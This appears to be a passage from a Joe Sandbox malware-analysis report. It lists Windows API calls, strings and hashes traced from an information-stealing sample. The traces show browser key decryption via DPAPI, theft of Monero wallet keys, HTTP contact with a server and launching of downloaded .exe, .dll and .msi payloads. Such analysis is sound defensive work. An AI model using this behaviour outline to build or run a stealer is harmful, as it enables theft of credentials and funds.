                                • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                              • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                              • String ID:
                              • API String ID: 3555725114-3916222277
                              • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                              • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                              • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                              • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022ECCD3
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022ECCF0
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 022ECCFC
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022ECD0F
                              • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022ECD1C
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022ECD40
                              • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022ECD5E
                              • StrStrA.SHLWAPI(00000000,0064A364), ref: 022ECD85
                              • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022ECF09
                              • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022ECF20
                                • Part of subcall function 022ECA87: memset.MSVCRT ref: 022ECABA
                                • Part of subcall function 022ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                                • Part of subcall function 022ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                                • Part of subcall function 022ECA87: memcpy.MSVCRT(?,?,?), ref: 022ECB79
                              • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022ECFC1
                              • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022ECFD8
                                • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                                • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                                • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                              • lstrlen.KERNEL32(00000000), ref: 022ED0AB
                              • CloseHandle.KERNEL32(00000000), ref: 022ED103
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                              • String ID:
                              • API String ID: 3555725114-3916222277
                              • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                              • Instruction ID: b8ee77e0d7826efe1f20cddda4f1c15a5f10c0ad021c5b414e0cc68e0edc059c
                              • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                              • Instruction Fuzzy Hash: 84E1FF75920308ABCB54EFE4DD91EEEF77AAF14700F404169F20AA6195DF346A89CF50
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0073CF48,00000000,00020019,00000000,004205B6), ref: 004183A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                              • wsprintfA.USER32 ref: 00418459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                              • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                              • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                              • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • memset.MSVCRT ref: 00410C1C
                              • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                              • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                              • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                              • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                              • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                              • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                              • lstrlenA.KERNEL32(?), ref: 00410CA7
                              • memset.MSVCRT ref: 00410CCD
                              • memset.MSVCRT ref: 00410CE1
                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0070F550,?,0042110C,?,00000000), ref: 0041A82B
                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00709C20,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                              • String ID: .exe
                              • API String ID: 1395395982-4119554291
                              • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                              • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                              • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                              • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                              • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                              • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                              • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                              APIs
                              • strtok_s.MSVCRT ref: 00411307
                              • strtok_s.MSVCRT ref: 00411750
                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0070F550,?,0042110C,?,00000000), ref: 0041A82B
                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: strtok_s$lstrcpylstrlen
                              • String ID:
                              • API String ID: 348468850-0
                              • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                              • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                              • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                              • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                              • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                              • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                              • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                              APIs
                              • memset.MSVCRT ref: 0041429E
                              • memset.MSVCRT ref: 004142B5
                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                              • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                              • lstrcatA.KERNEL32(?,00740558), ref: 0041430B
                              • lstrcatA.KERNEL32(?,?), ref: 0041431F
                              • lstrcatA.KERNEL32(?,0073FC38), ref: 00414333
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                              • StrStrA.SHLWAPI(?,00740510), ref: 004143F3
                              • GlobalFree.KERNEL32(?), ref: 00414512
                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                              • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                              • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                              • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                              • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                              • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 1191620704-0
                              • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                              • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                              • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                              • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                              APIs
                              • memset.MSVCRT ref: 022F4505
                              • memset.MSVCRT ref: 022F451C
                                • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                              • lstrcat.KERNEL32(?,00000000), ref: 022F4553
                              • lstrcat.KERNEL32(?,0064A30C), ref: 022F4572
                              • lstrcat.KERNEL32(?,?), ref: 022F4586
                              • lstrcat.KERNEL32(?,0064A5D8), ref: 022F459A
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,0042565C,?,?,00420E1F), ref: 022F9006
                                • Part of subcall function 022E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022E9FA0
                                • Part of subcall function 022E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022E9FF9
                                • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                • Part of subcall function 022F9627: GlobalAlloc.KERNEL32(00000000,022F4644,022F4644), ref: 022F963A
                              • StrStrA.SHLWAPI(?,0064A0D8), ref: 022F465A
                              • GlobalFree.KERNEL32(?), ref: 022F4779
                                • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                                • Part of subcall function 022E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                                • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
                                • Part of subcall function 022E9D27: LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                                • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                              • lstrcat.KERNEL32(?,00000000), ref: 022F470A
                              • StrCmpCA.SHLWAPI(?,004208D1), ref: 022F4727
                              • lstrcat.KERNEL32(00000000,00000000), ref: 022F4739
                              • lstrcat.KERNEL32(00000000,?), ref: 022F474C
                              • lstrcat.KERNEL32(00000000,00420FB8), ref: 022F475B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 1191620704-0
                              • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                              • Instruction ID: 9909a654cbe1a59b1fc7ced73218e20d6a4779f1f8c9c5d7f42c70c81a1954ef
                              • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                              • Instruction Fuzzy Hash: E17174B6910218BBDB14FBE0DC45FEEB37AAF49300F4085A8E60996184EB75DB48CF51
                              APIs
                              • memset.MSVCRT ref: 00401327
                                • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                              • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                              • lstrlenA.KERNEL32(?), ref: 0040135C
                              • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00709C20,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                              • memset.MSVCRT ref: 00401516
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 1930502592-218353709
                              • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                              • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                              • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                              • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                              APIs
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00740FA8), ref: 00406303
                                • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00740690,00000000,00000000,00400100,00000000), ref: 00406385
                                • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                              • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                              • lstrlenA.KERNEL32(00000000), ref: 00415383
                              • strtok.MSVCRT(00000000,?), ref: 0041539E
                              • lstrlenA.KERNEL32(00000000), ref: 004153AE
